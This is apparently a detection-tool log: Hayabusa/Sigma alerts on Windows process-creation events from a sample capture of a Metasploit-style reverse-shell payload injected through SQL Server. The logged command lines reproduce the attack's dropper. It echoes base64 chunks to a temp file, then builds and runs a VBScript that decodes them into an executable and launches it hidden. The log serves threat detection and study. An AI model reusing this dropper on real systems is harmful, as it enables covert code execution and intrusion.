AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAAAAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.444 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.444 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.446 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.718 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQACAAIAAAAOAAIAAgAAAA4APwAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAMYGAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAKIGAAABADAANAAwADkAMAA0AGIAMAAAADAEDAIBAEMAbwBtAG0AZQBuAHQAcwAAAEwAaQBjAGUAbgBzAGUAZAAgAHUAbgBkAGUAcgAgAHQAaABlACAAQQBwAGEAYwBoAGUAIABMAGkAYwBlAG4AcwBlACwAIABWAGUAcgBzAGkAbwBuACAAMgAuADAAIAAoAHQAaABlACAAIgBMAGkAYwBlAG4AcwBlACIAKQA7ACAAeQBvAHUAIABtAGEAeQAgAG4AbwB0ACAAdQBzAGUAIAB0AGgAaQBzACAAZgBpAGwAZQAgAGUAeABjAGUAcAB0ACAAaQBuACAAYwBvAG0AcABsAGkAYQBuAGMAZQAgAHcAaQB0AGgAIAB0AGgAZQAgAEwAaQBjAGUAbgBzAGUALgAgAFkAbwB1ACAAbQBhAHkAIABvAGIAdABhAGkAbgAgAGEAIABjAG8AcAB5ACAAbwBmACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAYQB0AA0ACgANAAoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAcABhAGMAaABlAC4AbwByAGcALwBsAGkAYwBlAG4AcwBlAHMALwBMAEkAQwBFAE4AUwBFAC0AMgAuADAADQAKAA0ACgBVAG4AbABlAHMAcwAgAHIAZQBxAHUAaQByAGUAZAAgAGIAeQAgAGEAcABwAGwAaQBjAGEAYgBsAGUAIABsAGEAdwAgAG8AcgAgAGEAZwByAGUAZQBkACAAdABvACAAaQBuACAAdwByAGkAdABpAG4AZwAsACAAcwBvAGYAdAB3AGEAcgBlACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAaQBzACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAbwBuACAAYQBuACAAIgBBAFMAIABJAFMAIgAgAEIAQQBTAEkAUwAsACAAVwBJAFQASABPAFUAVAAgAFcAQQBSAFIAQQBOAFQASQBFAFMAIABPAFIAIABDAE8ATgBEAEkAVABJAE8ATgBTACAATwBGACAAQQBOAFkAIABLAEkATgBEACwAIABlAGkAdABoAGUAcgAgAGUAeABwAHIAZQBzAHMAIABvAHIAIABpAG0AcABsAGkAZQBkAC4AIABTAGUAZQAgAHQAaABlACAATABpAGMAZQBuAHMAZQAgAGYAbwByACAAdABoAGUAIABzAHAAZQBjAGkAZgBpAGMAIABsAGEAbgBnAHUAYQBnAGUAIABnAG8AdgBlAHIA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.718 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.718 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.720 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.991 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo bgBpAG4AZwAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAgAGEAbgBkACAAbABpAG0AaQB0AGEAdABpAG8AbgBzACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlAC4AAABWABsAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAAUwBvAGYAdAB3AGEAcgBlACAARgBvAHUAbgBkAGEAdABpAG8AbgAAAAAAagAhAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEEAcABhAGMAaABlAEIAZQBuAGMAaAAgAGMAbwBtAG0AYQBuAGQAIABsAGkAbgBlACAAdQB0AGkAbABpAHQAeQAAAAAALgAHAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAyAC4AMgAuADEANAAAAAAALgAHAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABhAGIALgBlAHgAZQAAAAAAggAvAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIAAyADAAMAA5ACAAVABoAGUAIABBAHAAYQBjAGgAZQAgAFMAbwBmAHQAdwBhAHIAZQAgAEYAbwB1AG4AZABhAHQAaQBvAG4ALgAAAAAANgAHAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAGEAYgAuAGUAeABlAAAAAABGABMAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAASABUAFQAUAAgAFMAZQByAHYAZQByAAAAAAAyAAcAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAyAC4AMgAuADEANAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAkEsAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.991 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.991 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:26.994 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.266 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.266 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.266 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.268 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.540 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) >>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.540 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.540 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.542 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.815 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.815 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.815 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:27.817 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.092 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = ""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.092 +00:00,mssql01.offsec.lan,4688,critical,InitAccess | Persis | PrivEsc,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation_builtin/proc_creation_win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.092 +00:00,mssql01.offsec.lan,4688,low,Evas,Cmd Stream Redirection,,rules/sigma/process_creation_builtin/proc_creation_win_redirect_to_stream.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.092 +00:00,mssql01.offsec.lan,4688,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.094 +00:00,mssql01.offsec.lan,4688,info,Evas,Suspicius Conhost Legacy Option,,rules/sigma/process_creation_builtin/proc_creation_win_susp_conhost_option.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.113 +00:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.113 +00:00,mssql01.offsec.lan,4688,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation_builtin/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx +2020-08-01 22:58:28.113 +00:00,mssql01.offsec.lan,4688,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse 